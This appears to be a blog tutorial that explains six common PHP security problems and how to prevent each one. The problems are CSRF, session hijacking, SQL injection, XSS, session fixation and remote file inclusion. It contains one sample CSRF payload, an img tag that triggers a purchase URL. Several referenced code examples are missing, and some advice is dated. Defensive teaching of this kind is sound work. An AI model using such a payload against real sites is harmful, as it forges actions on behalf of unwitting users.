0

Top 6 Common PHP Security Issues And Their Solutions

Here,in this article I’m going to go tell you about top 6 common security threads in PHP scripts. You may familiar with this, if not, this is a good time for you to read and keep in mind.

1. Cross Site Request Forgeries (CSRF)

CSRF refers to a request for a page that looks like it was initated by a site’s trusted users, but wasn’t deliberately. Many variations. One of the example:

<img src='http://example.com/single_click_to_buy.php?user_id=123&item=12345'>

Preventing Cross Site Request Forgeries
In general make sure the users come from your forms, and each form submission is matched to an individual form that you send out. There are two guides have to remember:
• User session with appropiate security measures, e.g.: Regenerate IDs and user SSL for every session.
• Generate another one-time token and embed it in the form, save it in the session (one of the session variable), and check it on submission.

2. Session capturing and hijacking

It’s the same idea of Session fixation, however, it involves stealing the session ID. If session IDs are stored in cookies, attackers can steal them through XSS and JavaScript. Session IDs can also be sniffed or obtained from proxy servers if contained in the URL.

Preventing Session capturing and hijacking
• Regenerate IDs
• If using sessions, always user SSL

3. SQL injection

SQL injection is a kind of attack that malicious users enter SQL in form fields in a way that affects the execution of SQL statements. A variation is command injection, where user data is passed through system() or exec(). It shares the same mechanism as SQL injection but for shell commands.

The above code, there is not proper filtered/escaped on user input value ($_POST['user_name']) on Line 1. This query could fail or even damage the DB if $user_name has a wrong format or contains substrings that transform your SQL statement to something else.

Preventing SQL injection

Options:
• Filter data using mysql[i]_real_escape_string()
• Manually check each piece of data is of the right type
• Use prepared statements and bind variables

Use prepared prepared statements

• Separating data and SQL logic
• The prepared statements will do filtering (e.g., escape) automatically
• Use it as a coding standard, can help limit problems caused by new developers within your organization.

4. XSS

XSS (Cross Site Scripting) is an attack by a user where they enter some data to your website that includes a client side script (generally JavaScript). If you output this data to another web page without filtering it, this script will be executed.

Accept text comments from user

Outputting comments to (another) user:

What’s going to happen??

• Annoying popups
• Refresh or redirections
• Corrupted pages or forms
• Steal cookies
• AJAX ( XMLHttpRequest )

Preventing XSS

In order to prevent XSS attact, proper filter output to the browser through htmlentities() in PHP. Basic usage of htmlentities() is simple, but there are many advanced controls.

5. Session fixation

Session security works on the assumption that a PHPSESSID is hard to guess. However, PHP can either accept a session id through a cookie or through the URL. Tricks a victim to use a specific (or another) session ID or a phishing attack is possible.

6. Code injection

Code injection is the exploitation of a computer bug that is caused by processing invalid data. The problem occurs when you accidentally execute arbitrary code, typically through file inclusion. Poorly written code can allow a remote file to be included and executed. Many PHP functions such as require can take an URL or a filename. Example:

The example on above, Passing user input as a filename or part of a filename invites users to start filenames with "http://".

Prevent Code Injection

• Filter user input
• Disable allow_url_fopen and/or allow_url_include setting in php.ini. This disables require/include/fopen of remote files.

Other general principles

• Don’t rely on server configuration to protect you especially if your web server/PHP is managed by your ISP, or if your web site might bebe migrated/deployed somewhere else in future migrated/deployed somewhere else in future. Embed the security-aware checking/logic in the website code (PHP, HTML, JavaScript, etc.)
• Design your server-side scripts with security from the ground up: e.g., use a single line of execution that begins with a single point of authentication and data cleaning – E.g., delegate all login/security checking logic in one PHP function/file to be included in all security-sensitive pages – Problems can be easily checked and solved
• Keep your code up to date. Stay on top of patches and advisories

Hope it will Help You and please like my facebook page :

and make me proud.By the way if you face any problem then let me know in comment section below

Leave a Reply

Your email address will not be published. Required fields are marked *